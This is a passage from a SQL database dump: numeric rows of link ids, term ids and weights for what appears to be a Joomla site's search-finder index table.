(249, 288482, 1.00331),
(249, 288483, 1.12),
(249, 288484, 1.19),
(249, 288485, 1.26),
(249, 288486, 1.14331),
(249, 288487, 1.37669),
(249, 288488, 1.12),
(249, 288489, 1.19),
(249, 288490, 0.93331),
(249, 288491, 1.00331),
(249, 288492, 0.32669),
(249, 288493, 1.00331),
(249, 288494, 1.21331),
(249, 288495, 1.23669),
(249, 288496, 1.07331),
(249, 288497, 1.02669),
(249, 288498, 1.12),
(249, 288738, 1.14331),
(249, 288739, 3.67992),
(249, 288740, 1.07331),
(249, 288741, 1.02669),
(249, 288742, 0.98),
(249, 288743, 0.95669),
(249, 288744, 1.21331),
(249, 288745, 0.88669),
(249, 288746, 0.98),
(249, 288747, 0.88669),
(249, 288748, 0.95669),
(249, 288749, 1.05),
(249, 288750, 1.00331),
(249, 288751, 0.91),
(249, 288752, 1.09669),
(249, 288753, 0.93331),
(249, 288754, 1.12),
(249, 288755, 1.07331),
(249, 288756, 1.07331),
(249, 288757, 1.12),
(249, 288758, 0.98),
(249, 288759, 0.98),
(249, 288760, 1.14331),
(249, 288761, 0.93331),
(249, 288762, 1.00331),
(249, 288763, 0.98),
(249, 288764, 1.07331),
(249, 288765, 0.88669),
(249, 288766, 1.12),
(249, 288767, 0.91),
(249, 288768, 1.05),
(249, 288769, 3.52008),
(249, 288770, 1.00331),
(249, 288771, 1.07331),
(249, 288772, 0.93331),
(249, 288773, 1.02669),
(249, 288774, 1.12),
(249, 288775, 1.07331),
(249, 288776, 1.19),
(249, 288777, 0.88669),
(305, 288777, 0.88669),
(249, 288778, 1.12),
(249, 288779, 0.86331),
(249, 288780, 0.93331),
(249, 288781, 0.98),
(249, 288782, 1.12),
(249, 288783, 0.98),
(249, 288784, 0.98),
(249, 288785, 0.91),
(249, 288786, 1.07331),
(249, 288787, 0.88669),
(249, 288788, 1.16669),
(250, 289339, 2.4666),
(250, 289340, 2.6666),
(250, 289378, 0.93331),
(250, 289379, 1.05),
(251, 289415, 0.84),
(251, 289416, 2.94),
(251, 289417, 1.07331),
(251, 289418, 1.07331),
(251, 289419, 1.09669),
(251, 289467, 2.79993),
(251, 289468, 1.02669),
(251, 289469, 1.02669),
(251, 289470, 1.05),
(252, 289666, 0.84),
(252, 289667, 1.00331),
(252, 289668, 1.21331),
(252, 289669, 1.02669),
(252, 289670, 1.12),
(252, 289671, 1.09669),
(252, 289940, 0.98),
(252, 289941, 0.91),
(252, 289942, 1.02669),
(252, 289943, 1.05),
(252, 289944, 1.02669),
(252, 289945, 1.07331),
(252, 289946, 1.00331),
(252, 289947, 0.88669),
(252, 289948, 1.00331),
(252, 289949, 1.05),
(252, 289950, 0.98),
(252, 289951, 0.98),
(252, 289952, 0.98),
(252, 289953, 1.07331),
(252, 289954, 1.72662),
(252, 289955, 1.96),
(252, 289956, 2.05338),
(252, 289957, 1.05),
(252, 289958, 0.91),
(252, 289959, 0.98),
(252, 289960, 0.88669),
(252, 289961, 1.09669),
(252, 289962, 0.95669),
(306, 289962, 0.95669),
(252, 289963, 0.93331),
(252, 289964, 1.12),
(252, 289965, 1.00331),
(306, 289965, 1.00331),
(252, 289966, 1.07331),
(306, 289966, 1.07331),
(252, 289967, 1.05),
(252, 289968, 1.12),
(252, 289969, 0.95669),
(252, 289970, 1.09669),
(252, 289971, 0.84),
(252, 289972, 0.95669),
(252, 289973, 0.91),
(252, 289974, 0.98),
(252, 289975, 0.88669),
(252, 289976, 1.00331),
(252, 289977, 0.98),
(252, 289978, 1.05),
(252, 289979, 1.07331),
(252, 289980, 1.19),
(252, 289981, 1.00331),
(252, 289982, 0.91),
(252, 289983, 1.02669),
(252, 289984, 0.88669),
(252, 289985, 1.00331),
(252, 289986, 0.93331),
(252, 289987, 1.02669),
(252, 289988, 0.93331),
(252, 289989, 1.02669),
(252, 289990, 0.91),
(252, 289991, 0.91),
(252, 289992, 1.00331),
(252, 289993, 1.12),
(252, 289994, 0.91),
(252, 289995, 0.91),
(252, 289996, 0.98),
(252, 289997, 0.88669),
(252, 289998, 1.02669),
(252, 289999, 1.16669),
(252, 290000, 1.09669),
(252, 290001, 0.95669),
(252, 290002, 1.07331),
(252, 290003, 0.86331),
(252, 290004, 0.98),
(252, 290005, 1.00331),
(252, 290006, 0.98),
(306, 290006, 0.98),
(252, 290007, 1.05),
(252, 290008, 1.07331),
(252, 290009, 0.18669),
(252, 290010, 1.00331),
(252, 290011, 1.16669),
(252, 290012, 0.37331),
(252, 290013, 0.95669),
(252, 290014, 1.05),
(253, 290697, 1.12),
(253, 290698, 0.91),
(253, 290699, 1.05),
(253, 290700, 1.12),
(253, 290701, 1.23669),
(253, 290702, 0.86331),
(253, 290703, 0.98),
(253, 290704, 0.95669),
(253, 290705, 0.91),
(253, 290706, 1.14331),
(253, 291111, 0.93331),
(253, 291112, 1.09669),
(253, 291113, 0.98),
(253, 291114, 0.98),
(253, 291115, 1.07331),
(253, 291116, 1.02669),
(306, 291117, 0.88669),
(253, 291117, 1.77338),
(306, 291118, 0.95669),
(253, 291118, 1.91338),
(253, 291119, 1.00331),
(253, 291120, 0.93331),
(253, 291121, 1.02669),
(253, 291122, 0.98),
(253, 291123, 1.05),
(253, 291124, 1.02669),
(292, 291124, 1.02669),
(253, 291125, 1.05),
(253, 291126, 1.09669),
(253, 291127, 0.98),
(253, 291128, 2.1),
(253, 291129, 1.14331),
(253, 291130, 1.16669),
(253, 291131, 0.95669),
(253, 291132, 1.09669),
(253, 291133, 0.98),
(253, 291134, 1.07331),
(253, 291135, 1.14331),
(253, 291136, 0.91),
(253, 291137, 1.02669),
(253, 291138, 0.98),
(253, 291139, 1.09669),
(253, 291140, 1.05),
(253, 291141, 1.96),
(253, 291142, 1.07331),
(253, 291143, 1.05),
(253, 291144, 1.05),
(253, 291145, 1.02669),
(253, 291146, 1.28331),
(253, 291147, 0.91),
(253, 291148, 1.00331),
(253, 291149, 1.09669),
(253, 291150, 1.02669),
(253, 291151, 0.86331),
(253, 291152, 0.93331),
(253, 291153, 0.98),
(253, 291154, 0.98),
(253, 291155, 1.07331),
(253, 291156, 0.93331),
(253, 291157, 1.19),
(253, 291158, 1.02669),
(253, 291159, 0.93331),
(253, 291160, 1.02669),
(253, 291161, 0.93331),
(253, 291162, 0.88669),
(253, 291163, 1.00331),
(253, 291164, 0.98),
(253, 291165, 0.98),
(253, 291166, 0.88669),
(253, 291167, 0.98),
(253, 291168, 0.46662),
(253, 291169, 0.88669),
(253, 291170, 1.09669),
(253, 291171, 0.93331),
(253, 291172, 1.02669),
(253, 291173, 0.98),
(254, 291852, 0.86331),
(254, 291853, 1.00331),
(254, 291854, 0.98),
(254, 291855, 1.12),
(254, 291856, 0.93331),
(254, 291857, 1.02669),
(254, 291858, 1.00331),
(254, 291859, 1.07331),
(254, 291860, 0.98),
(254, 291861, 0.91),
(254, 291862, 0.95669),
(254, 291863, 0.91),
(254, 291864, 0.95669),
(254, 291865, 0.28),
(254, 291866, 1.05),
(254, 291867, 1.19),
(254, 291868, 1.12),
(254, 291869, 1.02669),
(254, 291870, 1.14331),
(254, 291871, 0.98),
(254, 291872, 1.07331),
(254, 291873, 0.42),
(254, 291874, 0.98),
(254, 291875, 1.05),
(254, 292319, 1.00331),
(254, 292320, 1.00331),
(254, 292321, 1.02669),
(254, 292322, 1.09669),
(254, 292323, 1.82),
(254, 292324, 2.14662),
(254, 292325, 0.91),
(254, 292326, 0.98),
(254, 292327, 0.95669),
(254, 292328, 0.91),
(254, 292329, 1.05),
(254, 292330, 1.00331),
(254, 292331, 0.95669),
(254, 292332, 1.00331),
(254, 292333, 0.91),
(254, 292334, 1.00331),
(254, 292335, 0.93331),
(254, 292336, 1.02669),
(254, 292337, 1.00331),
(254, 292338, 1.00331),
(254, 292339, 0.95669),
(254, 292340, 1.07331),
(254, 292341, 0.91),
(254, 292342, 1.14331),
(254, 292343, 1.12),
(254, 292344, 1.14331),
(254, 292345, 1.07331),
(254, 292346, 1.00331),
(254, 292347, 1.07331),
(254, 292348, 1.07331),
(254, 292349, 1.02669),
(254, 292350, 2.05338),
(254, 292351, 1.16669),
(254, 292352, 1.12),
(254, 292353, 1.91338),
(254, 292354, 1.05),
(254, 292355, 1.07331),
(254, 292356, 0.91),
(254, 292357, 0.98),
(254, 292358, 0.88669),
(254, 292359, 0.95669),
(254, 292360, 1.07331),
(254, 292361, 1.02669),
(254, 292362, 1.09669),
(254, 292363, 0.91),
(254, 292364, 1.07331),
(254, 292365, 1.23669),
(254, 292366, 1.09669),
(254, 292367, 0.95669),
(254, 292368, 1.00331),
(254, 292369, 0.93331),
(254, 292370, 1.02669),
(254, 292371, 0.91),
(254, 292372, 0.98),
(254, 292373, 0.91),
(254, 292374, 0.98),
(254, 292375, 0.93331),
(254, 292376, 1.02669),
(254, 292377, 0.98),
(254, 292378, 1.09669),
(254, 292379, 0.88669),
(254, 292380, 0.95669),
(254, 292381, 1.12),
(254, 292382, 2.14662),
(254, 292383, 1.05),
(254, 292384, 1.16669),
(254, 292385, 1.05),
(254, 292386, 1.02669),
(254, 292387, 1.12),
(254, 292388, 1.02669),
(254, 292389, 1.02669),
(254, 292390, 1.12),
(254, 292391, 0.91),
(254, 292392, 1.09669),
(254, 292393, 1.00331),
(254, 292394, 1.09669),
(254, 292395, 0.91),
(254, 292396, 1.02669),
(254, 292397, 1.00331),
(254, 292398, 0.95669),
(254, 292399, 1.02669),
(254, 292400, 0.32669),
(254, 292401, 1.02669),
(254, 292402, 1.14331),
(254, 292403, 1.12),
(254, 292404, 1.21331),
(254, 292405, 0.88669),
(254, 292406, 0.98),
(254, 292407, 1.19),
(254, 292408, 1.05),
(254, 292409, 0.95669),
(254, 292410, 1.02669),
(254, 292411, 1.00331),
(254, 292412, 1.09669),
(254, 292413, 1.00331),
(254, 292414, 1.07331),
(254, 292415, 2.00662),
(254, 292416, 0.95669),
(254, 292417, 1.02669),
(254, 292418, 1.09669),
(254, 292419, 1.00331),
(254, 292420, 0.98),
(254, 292421, 1.05),
(254, 292422, 0.98),
(254, 292423, 1.05),
(254, 292424, 0.91),
(254, 292425, 1.07331),
(254, 292426, 0.95669),
(254, 292427, 1.05),
(254, 292428, 0.95669),
(254, 292429, 1.05),
(254, 292430, 0.93331),
(254, 292431, 1.09669),
(254, 292432, 0.91),
(254, 292433, 1.12),
(254, 292434, 0.95669),
(254, 292435, 0.86331),
(254, 292436, 0.95669),
(254, 292437, 1.00331),
(254, 292438, 1.05),
(254, 292439, 0.98),
(254, 292440, 0.98),
(254, 292441, 1.19),
(254, 292442, 0.93331),
(254, 292443, 1.05),
(254, 292444, 0.93331),
(254, 292445, 0.98),
(254, 292446, 0.93331),
(254, 292447, 0.98),
(254, 292448, 0.88669),
(254, 292449, 0.98),
(254, 292450, 1.07331),
(254, 292451, 0.86331),
(254, 292452, 0.93331),
(254, 292453, 1.00331),
(254, 292454, 0.88669),
(254, 292455, 0.98),
(254, 292456, 0.95669),
(254, 292457, 1.05),
(254, 292458, 0.88669),
(254, 292459, 1.07331),
(254, 292460, 0.93331),
(254, 292461, 1.02669),
(254, 292462, 1.02669),
(255, 292612, 0.88669),
(255, 292613, 0.98),
(255, 292616, 0.88669),
(255, 292617, 1.00331),
(255, 292722, 0.98),
(255, 292723, 1.09669),
(255, 292724, 0.28),
(255, 292725, 0.93331),
(255, 292726, 1.02669),
(255, 292727, 0.93331),
(255, 292728, 1.05),
(255, 292729, 0.91),
(255, 292730, 0.98),
(255, 292731, 0.56),
(255, 292732, 1.12),
(255, 292733, 1.23669),
(255, 292974, 0.93331),
(255, 292975, 1.09669),
(255, 292976, 1.02669),
(255, 292977, 1.07331),
(255, 292978, 1.07331),
(255, 292979, 1.00331),
(255, 292980, 0.88669),
(304, 292980, 0.88669),
(255, 292981, 0.95669),
(304, 292981, 0.95669),
(255, 292982, 1.00331),
(255, 292983, 1.02669),
(255, 292984, 1.05),
(255, 292985, 1.02669),
(255, 292986, 0.86331),
(255, 292987, 1.00331),
(255, 292988, 1.00331),
(255, 292989, 1.12),
(255, 292990, 1.00331),
(255, 292991, 0.86331),
(255, 292992, 1.02669),
(255, 292993, 1.07331),
(255, 292994, 0.98),
(255, 292995, 1.07331),
(255, 292996, 1.09669),
(255, 292997, 1.07331),
(255, 292998, 1.02669),
(255, 292999, 0.93331),
(306, 292999, 0.93331),
(255, 293000, 1.07331),
(255, 293001, 1.02669),
(255, 293002, 1.00331),
(255, 293003, 1.07331),
(255, 293004, 0.93331),
(255, 293005, 1.02669),
(255, 293006, 1.05),
(255, 293007, 1.16669),
(255, 293008, 1.82),
(255, 293009, 0.93331),
(255, 293010, 1.00331),
(255, 293011, 0.95669),
(255, 293012, 1.07331),
(255, 293013, 0.93331),
(255, 293014, 1.05),
(255, 293015, 0.95669),
(255, 293016, 1.02669),
(255, 293017, 0.95669),
(255, 293018, 1.00331),
(255, 293019, 0.95669),
(255, 293020, 0.98),
(255, 293021, 0.98),
(255, 293022, 0.95669),
(255, 293023, 1.07331),
(255, 293024, 1.02669),
(256, 293124, 0.88669),
(256, 293125, 0.95669),
(256, 293270, 0.91),
(256, 293271, 1.05),
(256, 293272, 0.88669),
(256, 293273, 0.98),
(256, 293274, 0.91),
(256, 293275, 1.05),
(256, 293276, 0.32669),
(256, 293277, 0.98),
(256, 293278, 1.12),
(256, 293279, 1.05),
(256, 293280, 1.16669),
(256, 293281, 1.02669),
(256, 293282, 1.12),
(256, 293283, 1.05),
(256, 293284, 1.14331),
(256, 293285, 1.02669),
(256, 293286, 1.14331),
(256, 293624, 0.88669),
(256, 293625, 0.98),
(256, 293626, 0.32669),
(256, 293627, 0.98),
(256, 293628, 1.07331),
(256, 293629, 1.09669),
(256, 293630, 0.88669),
(256, 293631, 1.00331),
(256, 293632, 0.95669),
(256, 293633, 1.02669),
(256, 293634, 0.98),
(256, 293635, 1.09669),
(256, 293636, 1.00331),
(256, 293637, 0.98),
(256, 293638, 6.3),
(256, 293639, 0.98),
(256, 293640, 0.93331),
(256, 293641, 1.07331),
(256, 293642, 0.95669),
(256, 293643, 1.00331),
(256, 293644, 1.19),
(256, 293645, 0.95669),
(256, 293646, 1.02669),
(256, 293647, 1.30669),
(256, 293648, 0.86331),
(256, 293649, 0.95669),
(256, 293650, 0.95669),
(256, 293651, 0.93331),
(256, 293652, 1.02669),
(256, 293653, 0.98),
(256, 293654, 0.95669),
(256, 293655, 1.07331),
(256, 293656, 0.91),
(256, 293657, 1.02669),
(256, 293658, 0.91),
(256, 293659, 1.14331),
(256, 293660, 0.46669),
(256, 293661, 1.00331),
(256, 293662, 1.09669),
(256, 293663, 0.95669),
(256, 293664, 1.00331),
(256, 293665, 0.91),
(256, 293666, 1.05),
(256, 293667, 1.07331),
(256, 293668, 1.09669),
(256, 293669, 0.93331),
(256, 293670, 1.12),
(256, 293671, 1.09669),
(256, 293672, 1.00331),
(256, 293673, 1.07331),
(256, 293674, 0.91),
(256, 293675, 0.98),
(256, 293676, 1.02669),
(256, 293677, 1.02669),
(256, 293678, 0.91),
(256, 293679, 1.05),
(256, 293680, 1.05),
(256, 293681, 0.98),
(256, 293682, 0.95669),
(256, 293683, 1.05),
(256, 293684, 0.93331),
(256, 293685, 0.86331),
(256, 293686, 0.98),
(256, 293687, 0.93331),
(256, 293688, 1.02669),
(256, 293689, 0.98),
(256, 293690, 1.07331),
(256, 293691, 0.86331),
(256, 293692, 1.00331),
(256, 293693, 1.02669),
(256, 293694, 1.14331),
(257, 294294, 1.14331),
(257, 294295, 0.86331),
(257, 294296, 1.07331),
(257, 294297, 1.02669),
(257, 294298, 1.14331),
(257, 294299, 0.98),
(257, 294300, 1.14331),
(257, 294578, 1.05),
(257, 294579, 0.93331),
(257, 294580, 1.00331),
(257, 294581, 0.93331),
(257, 294582, 1.12),
(257, 294583, 1.02669),
(257, 294584, 1.09669),
(257, 294585, 0.91),
(257, 294586, 1.00331),
(257, 294587, 1.00331),
(257, 294588, 1.07331),
(257, 294589, 0.95669),
(305, 294589, 0.95669),
(257, 294590, 1.05),
(305, 294590, 1.05),
(257, 294591, 0.95669),
(304, 294591, 0.95669),
(257, 294592, 0.95669),
(257, 294593, 0.91),
(257, 294594, 1.16669),
(257, 294595, 1.91338),
(257, 294596, 2.28662),
(257, 294597, 0.93331),
(257, 294598, 1.14331),
(257, 294599, 1.02669),
(257, 294600, 0.98),
(257, 294601, 1.07331),
(257, 294602, 1.14331),
(257, 294603, 0.88669),
(257, 294604, 1.00331),
(257, 294605, 1.07331),
(257, 294606, 0.98),
(257, 294607, 1.05),
(257, 294608, 0.95669),
(257, 294609, 0.88669),
(306, 294609, 1.77338),
(257, 294610, 0.95669),
(306, 294610, 1.91338),
(257, 294611, 0.88669),
(257, 294612, 0.95669),
(257, 294613, 1.14331),
(257, 294614, 1.00331),
(257, 294615, 1.09669),
(257, 294616, 1.86662),
(257, 294617, 1.00331),
(257, 294618, 1.07331),
(257, 294619, 0.98),
(257, 294620, 1.07331),
(257, 294621, 1.05),
(257, 294622, 1.05),
(257, 294623, 0.86331),
(257, 294624, 0.98),
(257, 294625, 0.95669),
(257, 294626, 1.02669),
(257, 294627, 1.05),
(257, 294628, 1.14331),
(257, 294629, 0.98),
(257, 294630, 3.21993),
(257, 294631, 0.93331),
(257, 294632, 1.00331),
(257, 294633, 1.05),
(257, 294634, 1.16669),
(257, 294635, 1.12),
(257, 294636, 1.05),
(257, 294637, 0.37331),
(257, 294638, 0.98),
(257, 294639, 1.19),
(257, 294640, 0.98),
(306, 294640, 0.98),
(257, 294641, 1.07331),
(257, 294642, 0.28),
(257, 294643, 0.91),
(257, 294644, 0.95669),
(257, 294645, 1.05),
(257, 294646, 0.28),
(257, 294647, 0.93331),
(257, 294648, 1.14331),
(257, 294649, 1.00331),
(257, 294650, 1.09669),
(257, 294651, 0.93331),
(257, 294652, 1.05),
(257, 294653, 0.84),
(257, 294654, 0.93331),
(257, 294655, 1.02669),
(257, 294656, 1.14331),
(257, 294657, 1.00331),
(257, 294658, 1.02669),
(257, 294659, 0.88669),
(257, 294660, 0.98),
(257, 294661, 0.23331),
(257, 294662, 0.91),
(257, 294663, 1.12),
(257, 294664, 0.32669),
(257, 294665, 0.93331),
(257, 294666, 1.02669),
(258, 295168, 0.77),
(258, 295169, 0.88669),
(258, 295170, 0.81669),
(258, 295171, 0.93331),
(258, 295285, 0.93331),
(258, 295286, 1.05),
(258, 295287, 0.95669),
(258, 295288, 1.02669),
(258, 295289, 0.98),
(258, 295681, 0.88669),
(258, 295682, 0.95669),
(258, 295683, 0.93331),
(258, 295684, 1.09669),
(258, 295685, 0.95669),
(258, 295686, 1.05),
(258, 295687, 1.00331),
(258, 295688, 1.00331),
(258, 295689, 1.02669),
(292, 295689, 1.02669),
(306, 295689, 1.02669),
(258, 295690, 1.05),
(258, 295691, 1.14331),
(258, 295692, 1.02669),
(258, 295693, 0.95669),
(258, 295694, 0.93331),
(292, 295694, 0.93331),
(258, 295695, 1.00331),
(292, 295695, 1.00331),
(258, 295696, 0.93331),
(258, 295697, 1.00331),
(258, 295698, 0.93331),
(258, 295699, 1.00331),
(258, 295700, 1.12),
(258, 295701, 1.02669),
(258, 295702, 1.07331),
(258, 295703, 1.82),
(258, 295704, 1.96),
(258, 295705, 0.93331),
(258, 295706, 1.02669),
(258, 295707, 0.98),
(258, 295708, 1.02669),
(258, 295709, 0.95669),
(258, 295710, 1.05),
(292, 295710, 1.05),
(258, 295711, 1.00331),
(258, 295712, 0.91),
(258, 295713, 0.98),
(258, 295714, 1.02669),
(258, 295715, 0.93331),
(258, 295716, 1.00331),
(258, 295717, 0.91),
(258, 295718, 1.07331),
(258, 295719, 1.02669),
(258, 295720, 1.16669),
(258, 295721, 0.98),
(258, 295722, 1.00331),
(258, 295723, 0.95669),
(258, 295724, 1.07331),
(258, 295725, 0.98),
(258, 295726, 0.95669),
(292, 295726, 0.95669),
(258, 295727, 1.07331),
(258, 295728, 1.00331),
(258, 295729, 1.00331),
(258, 295730, 0.95669),
(258, 295731, 1.05),
(258, 295732, 0.88669),
(258, 295733, 1.05),
(258, 295734, 0.93331),
(258, 295735, 1.07331),
(258, 295736, 0.84),
(258, 295737, 0.93331),
(258, 295738, 0.98),
(258, 295739, 0.91),
(258, 295740, 1.00331),
(258, 295741, 0.91),
(258, 295742, 1.05),
(258, 295743, 1.00331),
(258, 295744, 0.98),
(258, 295745, 1.00331),
(258, 295746, 0.91),
(258, 295747, 0.98),
(258, 295748, 0.86331),
(258, 295749, 0.93331),
(258, 295750, 0.91),
(258, 295751, 1.00331),
(258, 295752, 0.84),
(258, 295753, 1.02669),
(258, 295754, 0.98),
(306, 295754, 0.98),
(258, 295755, 1.07331),
(306, 295755, 1.07331),
(258, 295756, 1.00331),
(258, 295757, 0.98),
(258, 295758, 0.91),
(258, 295759, 1.05),
(258, 295760, 0.98),
(258, 295761, 1.91338),
(258, 295762, 0.98),
(258, 295763, 1.09669),
(259, 296192, 1.26),
(259, 296193, 1.12),
(259, 296194, 1.21331),
(259, 296195, 0.60669),
(259, 296196, 1.21331),
(259, 296197, 1.33),
(260, 296227, 1.16669),
(261, 296242, 2.4666),
(261, 296243, 2.7334),
(261, 296449, 1.00331),
(261, 296450, 1.07331),
(261, 296451, 0.56),
(261, 296452, 1.05),
(261, 296453, 1.30669),
(261, 296454, 1.02669),
(261, 296455, 1.14331),
(261, 296804, 1.05),
(261, 296805, 1.12),
(261, 296806, 3.50007),
(261, 296807, 1.09669),
(261, 296808, 1.28331),
(261, 296809, 2.24),
(261, 296810, 2.61338),
(261, 296811, 0.95669),
(306, 296811, 0.95669),
(261, 296812, 1.00331),
(261, 296813, 1.09669),
(261, 296814, 1.16669),
(261, 296815, 3.36),
(261, 296816, 1.00331),
(261, 296817, 1.09669),
(261, 296818, 0.81669),
(261, 296819, 0.95669),
(261, 296820, 1.02669),
(261, 296821, 1.07331),
(261, 296822, 0.95669),
(261, 296823, 1.02669),
(261, 296824, 0.88669),
(261, 296825, 0.95669),
(261, 296826, 1.00331),
(261, 296827, 0.91),
(261, 296828, 0.95669),
(261, 296829, 1.05),
(261, 296830, 1.07331),
(261, 296831, 0.91),
(261, 296832, 1.00331),
(261, 296833, 0.88669),
(261, 296834, 1.00331),
(261, 296835, 0.91),
(261, 296836, 1.05),
(261, 296837, 0.91),
(261, 296838, 1.05),
(261, 296839, 1.00331),
(306, 296839, 1.00331),
(261, 296840, 1.09669),
(261, 296841, 0.95669),
(261, 296842, 1.02669),
(261, 296843, 0.88669),
(261, 296844, 0.98),
(261, 296845, 0.81669),
(261, 296846, 0.88669),
(261, 296847, 0.95669),
(261, 296848, 0.93331),
(261, 296849, 0.98),
(261, 296850, 1.96),
(261, 296851, 1.12),
(261, 296852, 2.05338),
(261, 296853, 0.88669),
(261, 296854, 1.00331),
(261, 296855, 0.88669),
(261, 296856, 1.14331),
(261, 296857, 1.05),
(261, 296858, 1.23669),
(261, 296859, 0.98),
(261, 296860, 1.23669),
(261, 296861, 0.81669),
(261, 296862, 0.91),
(261, 296863, 0.91),
(261, 296864, 0.98),
(262, 297287, 0.93331),
(262, 297288, 1.05),
(262, 297289, 0.86331),
(262, 297290, 1.02669),
(262, 297291, 2.4666),
(262, 297292, 2.7334),
(262, 297298, 0.91),
(262, 297299, 1.02669),
(262, 297541, 0.32669),
(262, 297542, 0.91),
(262, 297543, 1.09669),
(262, 297544, 1.02669),
(262, 297545, 1.14331),
(262, 297546, 0.51331),
(262, 297547, 1.19),
(262, 297548, 1.35331),
(262, 297549, 1.00331),
(262, 297550, 1.07331),
(262, 297551, 1.05),
(262, 297552, 1.28331),
(262, 297553, 0.51331),
(262, 297554, 1.09669),
(262, 297555, 1.21331),
(262, 297556, 1.02669),
(262, 297557, 1.12),
(262, 297558, 1.14331),
(262, 297559, 0.95669),
(292, 297559, 0.95669),
(262, 297560, 1.09669),
(292, 297560, 1.09669),
(262, 297561, 0.93331),
(262, 297562, 1.00331),
(262, 297563, 0.93331),
(262, 297564, 1.05),
(262, 297565, 0.42),
(262, 297566, 1.00331),
(262, 297567, 1.21331),
(262, 297568, 2.00662),
(262, 297569, 2.33338),
(262, 297570, 1.00331),
(262, 297571, 1.12),
(262, 298085, 0.91),
(262, 298086, 0.98),
(262, 298087, 0.91),
(288, 298087, 1.82),
(262, 298088, 0.98),
(262, 298089, 1.00331),
(262, 298090, 0.86331),
(262, 298091, 1.07331),
(262, 298092, 0.98),
(262, 298093, 0.95669),
(262, 298094, 1.09669),
(262, 298095, 0.84),
(304, 298095, 0.84),
(262, 298096, 0.95669),
(262, 298097, 1.02669),
(262, 298098, 1.30669),
(262, 298099, 1.02669),
(262, 298100, 1.02669),
(262, 298101, 1.00331),
(262, 298102, 1.12),
(262, 298103, 0.93331),
(262, 298104, 0.93331),
(262, 298105, 0.98),
(262, 298106, 0.91),
(262, 298107, 0.98),
(262, 298108, 1.00331),
(262, 298109, 1.12),
(262, 298110, 1.00331),
(262, 298111, 1.14331),
(262, 298112, 1.09669),
(262, 298113, 1.12),
(262, 298114, 1.09669),
(262, 298115, 0.98),
(262, 298116, 0.98),
(262, 298117, 0.88669),
(262, 298118, 0.98),
(262, 298119, 1.12),
(262, 298120, 0.95669),
(262, 298121, 1.09669),
(262, 298122, 1.00331),
(262, 298123, 1.05),
(262, 298124, 1.12),
(306, 298125, 1.05),
(262, 298125, 2.1),
(262, 298126, 1.07331),
(262, 298127, 0.98),
(262, 298128, 1.07331),
(262, 298129, 1.07331),
(262, 298130, 1.02669),
(262, 298131, 1.00331),
(262, 298132, 1.00331),
(262, 298133, 1.02669),
(262, 298134, 1.02669),
(262, 298135, 1.05),
(262, 298136, 1.14331),
(262, 298137, 1.00331),
(262, 298138, 1.02669),
(262, 298139, 1.14331),
(262, 298140, 1.02669),
(262, 298141, 1.26),
(262, 298142, 0.91),
(262, 298143, 1.02669),
(262, 298144, 1.09669),
(262, 298145, 1.19),
(262, 298146, 1.05),
(262, 298147, 1.28331),
(305, 298148, 0.93331),
(262, 298148, 1.86662),
(262, 298149, 1.09669),
(262, 298150, 1.02669),
(262, 298151, 0.91),
(262, 298152, 0.95669),
(262, 298153, 0.88669),
(262, 298154, 0.98),
(262, 298155, 1.00331),
(262, 298156, 0.91),
(262, 298157, 1.02669),
(262, 298158, 0.93331),
(262, 298159, 1.02669),
(262, 298160, 1.00331),
(262, 298161, 1.07331),
(262, 298162, 1.16669),
(262, 298163, 0.86331),
(262, 298164, 0.95669),
(262, 298165, 1.07331),
(262, 298166, 1.12),
(262, 298167, 1.05),
(262, 298168, 0.95669),
(262, 298169, 0.88669),
(288, 298169, 0.88669),
(262, 298170, 1.02669),
(262, 298171, 0.91),
(262, 298172, 1.09669),
(262, 298173, 1.07331),
(262, 298174, 1.12),
(262, 298175, 0.98),
(262, 298176, 0.88669),
(262, 298177, 0.95669),
(262, 298178, 1.07331),
(262, 298179, 2.00662),
(262, 298180, 2.24),
(262, 298181, 1.00331),
(262, 298182, 1.96),
(262, 298183, 0.93331),
(262, 298184, 1.02669),
(262, 298185, 4.01324),
(262, 298186, 4.48),
(262, 298187, 0.93331),
(304, 298187, 0.93331),
(262, 298188, 1.05),
(262, 298189, 0.98),
(262, 298190, 0.98),
(262, 298191, 1.00331),
(262, 298192, 0.93331),
(262, 298193, 1.02669),
(262, 298194, 1.02669),
(262, 298195, 0.46669),
(262, 298196, 1.09669),
(262, 298197, 1.23669),
(262, 298198, 0.88669),
(262, 298199, 1.00331),
(263, 299335, 0.74),
(263, 299336, 2.4666),
(263, 299337, 2.7334),
(263, 299342, 0.77),
(263, 299343, 0.86331),
(263, 299534, 0.14),
(263, 299535, 0.81669),
(263, 299536, 0.86331),
(263, 299537, 0.91),
(263, 299538, 1.07331),
(263, 299539, 0.84),
(263, 299540, 2.05338),
(263, 299541, 2.42662),
(263, 299542, 0.51331),
(263, 299543, 1.21331),
(263, 299544, 1.30669),
(263, 299545, 1.05),
(263, 299546, 1.12),
(263, 299547, 1.05),
(263, 299548, 1.12),
(263, 299549, 0.98),
(263, 299550, 1.05),
(263, 299551, 0.91),
(263, 299552, 1.05),
(263, 299924, 0.32669),
(263, 299925, 0.98),
(263, 299926, 1.09669),
(263, 299927, 1.02669),
(263, 299928, 1.00331),
(288, 299928, 1.00331),
(263, 299929, 1.23669),
(263, 299930, 0.93331),
(263, 299931, 1.14331),
(263, 299932, 0.88669),
(263, 299933, 0.95669),
(263, 299934, 1.02669),
(263, 299935, 1.02669),
(263, 299936, 1.21331),
(263, 299937, 1.02669);
INSERT INTO `y57u5_finder_links_termse` (`link_id`, `term_id`, `weight`) VALUES
(263, 299938, 0.88669),
(305, 299938, 0.88669),
(306, 299938, 0.88669),
(263, 299939, 1.07331),
(263, 299940, 1.00331),
(305, 299940, 1.00331),
(263, 299941, 0.95669),
(263, 299942, 1.02669),
(263, 299943, 1.02669),
(263, 299944, 1.07331),
(263, 299945, 1.07331),
(263, 299946, 0.86331),
(263, 299947, 0.98),
(263, 299948, 0.95669),
(263, 299949, 1.12),
(263, 299950, 1.00331),
(263, 299951, 1.12),
(263, 299952, 1.07331),
(263, 299953, 1.07331),
(263, 299954, 1.00331),
(263, 299955, 0.91),
(263, 299956, 1.00331),
(263, 299957, 0.98),
(263, 299958, 1.09669),
(263, 299959, 1.02669),
(263, 299960, 1.12),
(263, 299961, 1.05),
(263, 299962, 0.91),
(263, 299963, 0.98),
(263, 299964, 0.91),
(263, 299965, 0.98),
(263, 299966, 0.86331),
(263, 299967, 1.07331),
(263, 299968, 0.84),
(263, 299969, 0.95669),
(263, 299970, 0.98),
(263, 299971, 0.88669),
(306, 299971, 0.88669),
(288, 299971, 1.77338),
(263, 299972, 1.00331),
(263, 299973, 1.12),
